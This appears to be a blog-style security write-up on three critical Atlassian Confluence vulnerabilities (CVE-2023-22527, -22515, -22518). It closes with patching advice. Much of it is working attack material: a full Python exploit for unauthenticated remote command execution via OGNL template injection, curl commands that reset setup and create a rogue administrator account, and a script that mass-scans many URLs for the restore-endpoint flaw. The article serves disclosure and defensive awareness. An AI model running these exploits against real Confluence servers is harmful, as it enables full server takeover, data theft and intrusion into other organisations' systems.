avatarElNiak

Summary

The undefined website content discusses the critical vulnerabilities CVE-2023–22527, CVE-2023–22515, and CVE-2023–22518 in Atlassian Confluence, detailing their discovery, impact, and the technicalities of how they operate.

Abstract

In January 2024, the cybersecurity community focused on three critical vulnerabilities in Atlassian Confluence: CVE-2023–22527, CVE-2023–22515, and CVE-2023–22518. These vulnerabilities, with CVSS scores of 10.0, indicate maximum severity, allowing attackers to execute arbitrary code, bypass authentication, and perform unauthorized actions. CVE-2023–22527 is a template injection vulnerability enabling remote code execution without user interaction. CVE-2023–22515 is a zero-day vulnerability that was exploited before a patch was available, affecting the input handling of Confluence to bypass authentication. CVE-2023–22518 is an improper authorization vulnerability that could lead to data leakage or unauthorized modifications. The website provides detailed technical analysis, including proof-of-concept exploits and recommendations for mitigation, emphasizing the importance of updating to the latest Confluence versions to protect against these vulnerabilities.

Opinions

  • The author emphasizes the urgency for Atlassian Confluence users to update their software to the latest versions to mitigate the risks associated with these vulnerabilities.
  • The detailed technical descriptions and proof-of-concept exploits suggest that the author values transparency and thoroughness in cybersecurity reporting.
  • The author advocates for a proactive approach to cybersecurity, highlighting the need for organizations to remain vigilant and responsive to security advisories.
  • By encouraging readers to share their experiences and follow the author on social media, the author seeks to foster a community of cybersecurity awareness and knowledge sharing.
  • The inclusion of references to external resources such as Atlassian Security Advisories, CVE Details, and OWASP indicates the author's endorsement of these platforms as credible sources for further information and learning.

Unraveling Three Critical Vulnerabilities in Atlassian Confluence: CVE-2023–22515, CVE-2023–22518, and CVE-2023–22527

Explore the critical vulnerabilities CVE-2023–22527, CVE-2023–22515, and CVE-2023–22518 in Atlassian Confluence, their impacts, discovery, and how they operate.

Free version of this article

In January 2024, the cybersecurity community turned its attention to a critical vulnerability in Atlassian Confluence Data Center and Server, identified as CVE-2023–22527.

This vulnerability, alongside CVE-2023–22515 and CVE-2023–22518, represents a series of security challenges faced by users of the popular collaboration software.

This article provides an in-depth look at each of these vulnerabilities, their discovery, and how they work, highlighting the urgent need for awareness and action among the cybersecurity and developer communities.

CVE-2023–22527: A Template Injection Vulnerability

Discovery Date: CVE-2023–22527 was disclosed on January 16, 2024, signaling a crucial moment for Atlassian in its efforts to safeguard the Confluence platform against threats. The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.

How It Works: CVE-2023–22527 allows unauthenticated attackers to execute arbitrary code remotely by exploiting a template injection flaw in out-of-date versions of Confluence Data Center and Server. The vulnerability arises from the application’s handling of user input, enabling attackers to inject malicious templates that lead to remote code execution (RCE) without requiring user interaction​​​​​​.

source

Breaking Down the Exploit Strategy: Here is a potential PoC I found on the internet:

# @Time    : 2024/1/23
# @Author  : Nguyễn Đức Mạnh (MINKAY)
# @Vulnerability    : CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server

import argparse
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse

def get_confluence_version(target):
    parsed_url = urlparse(target)
    url = f"http://{parsed_url.netloc}/"

    try:
        response = requests.get(url)
        response.raise_for_status()

        soup = BeautifulSoup(response.text, 'html.parser')
        version_span = soup.find('span', {'id': 'footer-build-information'})

        if version_span:
            confluence_version = version_span.text.strip()
            return confluence_version

    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")

    return None

def check_exploitable_version(version):
    exploitable_versions = ['8.0.', '8.1.', '8.2.', '8.3.', '8.4.', '8.5.0', '8.5.1', '8.5.2', '8.5.3']
    for exploitable_version in exploitable_versions:
        if version.startswith(exploitable_version):
            return True
    return False

def exploit(target, cmd):
    confluence_version = get_confluence_version(target)

    if confluence_version:
        print(f"Confluence version: {confluence_version}")

        if check_exploitable_version(confluence_version):
            
            url = f"{target}/template/aui/text-inline.vm"

            http_proxy = "http://127.0.0.1:8080"
            https_proxy = "http://127.0.0.1:8080"

            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
            data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.
                   context\u0027\u005d.internalGet(\u0027ognl\u0027).
                   findValue(#parameters.x,{})%2b\u0027&[email protected].
                   ServletActionContext@getResponse().
                   setHeader('X-Cmd-Response',
                   (new freemarker.template.utility.Execute()).
                   exec({'"+ cmd +"'}))"

            response = requests.post(url, headers=headers, data=data, verify=False)
            if (response.headers.get("X-Cmd-Response")):
                print("Command Output:")
                print(response.headers.get("X-Cmd-Response"))
            else:
                print("No response")
                
        else:
            print("The version cannot exploit the exploit")
    else:
        print("Unable to determine version of Confluence")

def main():
    parser = argparse.ArgumentParser(
        description="Send request with target and cmd parameters",
        usage="python3 CVE-2023-22527.py --target <target> --cmd <cmd>\nExample: python3 CVE-2023-22527.py --target http://192.168.139.202 --cmd \"whoami\""
    )
    parser.add_argument("--target", required=True, help="Target address without http://")
    parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")

    args = parser.parse_args()
    exploit(args.target, args.cmd)

if __name__ == "__main__":
    main()

CVE-2023–22515 and CVE-2023–22518: Detailed Analysis

CVE-2023–22515

Discovery Date: This vulnerability was disclosed on October 4, 2023, marking the start of a troubling period for Atlassian Confluence Data Center and Server’s security. The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.

How It Works: Identified as a zero-day vulnerability exploited before a patch was available, CVE-2023–22515 allowed attackers to gain unauthorized access or control over affected Confluence servers. It specifically exploited the software’s input handling to bypass authentication or authorization controls, enabling elevated privileges or access to sensitive data​​.

Breaking Down the Exploit Strategy: The exploitation process can be broken down into several key steps, each leveraging unique aspects of the Confluence architecture and its defenses:

  1. Parameter Parsing Vulnerability: The exploit begins with the manipulation of how Confluence’s Xwork interceptors parse URL parameters, allowing attackers to directly influence object properties. This step lays the groundwork for deeper system manipulation.
  2. Bypassing Endpoint Restrictions: Although direct modifications are typically blocked post-setup through /setup/* endpoints, the exploit cleverly navigates around these restrictions by targeting the /server-info.action endpoint. This choice of target is strategic, exploiting gaps in endpoint security to reinitiate setup processes.
  3. Resetting the Setup Completion Flag: Central to the exploit is the manipulation of the setup completion flag within Confluence’s configuration. By marking the setup as incomplete, attackers can unlock restricted setup functionalities, paving the way for further system manipulation.
  4. Circumventing Cross-Site Request Forgery Protections: The exploit also demonstrates a method to bypass Confluence’s XSRF protections by using a specific header in the request. This step is crucial for executing unauthorized actions without detection.
  5. Final Steps to System Compromise: Utilizing crafted curl commands, the attacker completes the exploitation by creating a new administrative user and finalizing the setup under their control. This sequence of actions effectively grants attackers full control over the Confluence instance.
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

CVE-2023–22518

Discovery Date: Announced on October 31, 2023, CVE-2023–22518 highlighted continued security concerns for Atlassian Confluence.The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.

How It Works: CVE-2023–22518 was an improper authorization vulnerability that allowed attackers to perform unauthorized actions by exploiting weaknesses in the software’s access control mechanisms. This could lead to data leakage, unauthorized modifications, or other malicious activities​​.

Breaking Down the Exploit Strategy:

  • The exploit’s ingenuity lies in its manipulation of complex parameters through Confluence’s OGNL (Object-Graph Navigation Language) processing, specifically targeting methods capable of bypassing authentication via property modifications. This approach required a nuanced understanding of Confluence’s internal routing and permission checks, particularly within the /json namespace which supplements the /admin namespace functionalities.
  • The pivotal moment in the exploitation process involved bypassing the WebSudoInterceptor, a security mechanism designed to require elevated privilege re-authentication for critical operations. By identifying an action class devoid of the WebSudoRequired annotation and any inherent authentication checks, attackers could navigate Confluence’s defenses.
  • The exploit process culminated in crafting HTTP requests to the /json/setup-restore.action endpoint, bypassing the need for authentication by exploiting the lack of the WebSudoRequired annotation and leveraging the synchronous=true parameter to force a database restore operation without prior authentication.
import requests
import random
import string
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def random_string(length=10):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def post_setup_restore(baseurl):
    paths = ["/json/setup-restore.action", 
             "/json/setup-restore-local.action", 
             "/json/setup-restore-progress.action", 
             "/server-info.action"]
    for path in paths:
        url = f"{baseurl.rstrip('/')}{path}"

        headers = {
            "X-Atlassian-Token": "no-check",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
        }

        rand_str = random_string()
        data = (
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
            "true\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
            f"{rand_str}\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
            "Upload and import\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
        )

        try:
            response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

            if (response.status_code == 200 and
                'The zip file did not contain an entry' in response.text and 
                'exportDescriptor.properties' in response.text):
                print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
            else:
                print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
        except requests.RequestException as e:
            print(f"[*] Error connecting to {url}. Error: {e}")

def main():
    parser = argparse.ArgumentParser(description="Post setup restore script")
    parser.add_argument('--url', help='The URL to target', required=False)
    parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
    args = parser.parse_args()

    if args.url:
        post_setup_restore(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    post_setup_restore(url)
    else:
        print("You must provide either --url or --file argument.")

if __name__ == "__main__":
    main()

The Significance of These Vulnerabilities

The disclosure of CVE-2023–22527, along with CVE-2023–22515 and CVE-2023–22518, emphasizes the importance of maintaining updated software and implementing strong security measures. Atlassian Confluence has emerged as a prime target for attackers due to its widespread adoption and the valuable data it holds.

Recommendations for Mitigation

In response to these vulnerabilities, Atlassian released patches and updates for the affected versions. For CVE-2023–22527, versions 8.5.4 LTS and above, including specific updates for Data Center, contain fixes​​. I strongly recommend that organizations using Confluence update their installations immediately to protect against these vulnerabilities.

Conclusion

CVE-2023–22527, along with CVE-2023–22515 and CVE-2023–22518, serve as stark reminders of the persistent risks in our digital environment. The importance of keeping systems up to date and adhering to security best practices cannot be overstated. I encourage organizations to remain vigilant, promptly respond to security advisories, and foster a culture of cybersecurity awareness.

Your Insights and Experiences

Have you faced these vulnerabilities in your environment? What strategies have you employed to manage software vulnerabilities? I’d love to hear your thoughts and experiences in the comments below.

👏 If you found this analysis informative, please clap and follow me for more insights into cybersecurity trends and best practices. Your support helps me keep the community informed and secure.

Follow me on Twitter for the latest in cybersecurity !

Connect with me on LinkedIn for professional insights !

References and Further Reading

To gain a deeper understanding of these vulnerabilities and their implications for cybersecurity, the following resources offer extensive analyses and discussions:

  • Atlassian Security Advisories: Atlassian provides detailed advisories and mitigation steps for vulnerabilities affecting their products. Visit Atlassian’s official security advisory page.
  • CVE Details: The CVE database offers comprehensive information about the vulnerabilities, including technical descriptions and impact assessments. Explore CVE details.
  • Exploit Database: For those interested in the technical specifics of cybersecurity vulnerabilities, the Exploit Database contains PoC examples and exploit techniques. See Exploit Database.
  • OWASP: The Open Web Application Security Project provides resources on securing web applications and services, including guidelines that can help prevent similar vulnerabilities. Learn from OWASP.
  • Security Blogs and Analysis: Blogs such as Rapid7’s AttackerKB and the research blog by Sirius Ninja offer in-depth analyses of vulnerabilities and their exploitation in the wild. Read Rapid7’s AttackerKB analysis and explore Sirius Ninja’s research.
Atlassian
Cybersecurity
Bug Bounty
Vulnerability
Exploitation
Recommended from ReadMedium